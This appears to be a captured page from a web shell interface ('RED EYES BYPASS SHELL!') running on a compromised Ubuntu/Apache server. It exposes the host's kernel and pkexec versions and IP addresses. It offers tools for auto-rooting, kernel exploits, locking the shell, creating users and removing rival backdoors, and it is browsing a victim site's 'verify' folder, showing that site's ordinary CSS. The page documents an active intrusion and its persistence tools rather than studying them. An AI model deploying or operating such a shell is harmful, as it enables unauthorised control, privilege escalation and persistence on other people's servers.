Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
page /
verify /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
index.css
3.86
KB
-rwxr-xr-x
index.js
1.45
KB
-rwxr-xr-x
index.php
4.69
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.css
.index-content { display: flex; flex-direction: row; height: 100vh; justify-content: center; } .center { display: flex; align-items: center; justify-content: center; flex-direction: column; } .detail-text { margin: 0; width: 100%; color: #6c757d; text-align: center; } .err-content { height: 100vh; display: flex; align-items: center; flex-direction: row; justify-content: space-between; } .err-content .left, .err-content .rigth { width: 100%; } .err-content .left { display: flex; justify-content: center; align-items: center; } .err-content .left img { width: 480px; height: 480px; } .err-content .rigth p.header { font-size: 36px; color: #0056a1; font-weight: bold; } .err-content .rigth span { color: #6c757d; } .loader { width: 78px; height: 78px; display: inline-block; position: relative; } .loader::after, .loader::before { content: ''; box-sizing: border-box; width: 78px; height: 78px; border-radius: 50%; border: 2px solid rgb(139, 139, 139); position: absolute; left: 0; top: 0; animation: animloader 2s linear infinite; } .loader::after { animation-delay: 1s; } @keyframes animloader { 0% { transform: scale(0); opacity: 1; } 100% { transform: scale(1); opacity: 0; } } .title { margin-top: 20px; } .dummy-positioning { width: 100%; height: 100vh; align-items: center; justify-content: center; } .success-icon { display: inline-block; width: 8em; height: 8em; font-size: 20px; border-radius: 50%; border: 4px solid #96df8f; background-color: #fff; position: relative; overflow: hidden; transform-origin: center; -webkit-animation: showSuccess 180ms ease-in-out; animation: showSuccess 180ms ease-in-out; transform: scale(1); } .success-icon__tip, .success-icon__long { display: block; position: absolute; height: 4px; background-color: #96df8f; border-radius: 10px; } .success-icon__tip { width: 2.4em; top: 4.3em; left: 1.4em; transform: rotate(45deg); -webkit-animation: tipInPlace 300ms ease-in-out; animation: tipInPlace 300ms ease-in-out; -webkit-animation-fill-mode: forwards; animation-fill-mode: forwards; -webkit-animation-delay: 180ms; animation-delay: 180ms; visibility: hidden; } .success-icon__long { width: 4em; transform: rotate(-45deg); top: 3.7em; left: 2.75em; -webkit-animation: longInPlace 140ms ease-in-out; animation: longInPlace 140ms ease-in-out; -webkit-animation-fill-mode: forwards; animation-fill-mode: forwards; visibility: hidden; -webkit-animation-delay: 440ms; animation-delay: 440ms; } @-webkit-keyframes showSuccess { from { transform: scale(0); } to { transform: scale(1); } } @keyframes showSuccess { from { transform: scale(0); } to { transform: scale(1); } } @-webkit-keyframes tipInPlace { from { width: 0em; top: 0em; left: -1.6em; } to { width: 2.4em; top: 4.3em; left: 1.4em; visibility: visible; } } @keyframes tipInPlace { from { width: 0em; top: 0em; left: -1.6em; } to { width: 2.4em; top: 4.3em; left: 1.4em; visibility: visible; } } @-webkit-keyframes longInPlace { from { width: 0em; top: 5.1em; left: 3.2em; } to { width: 4em; top: 3.7em; left: 2.75em; visibility: visible; } } @keyframes longInPlace { from { width: 0em; top: 5.1em; left: 3.2em; } to { width: 4em; top: 3.7em; left: 2.75em; visibility: visible; } }
Close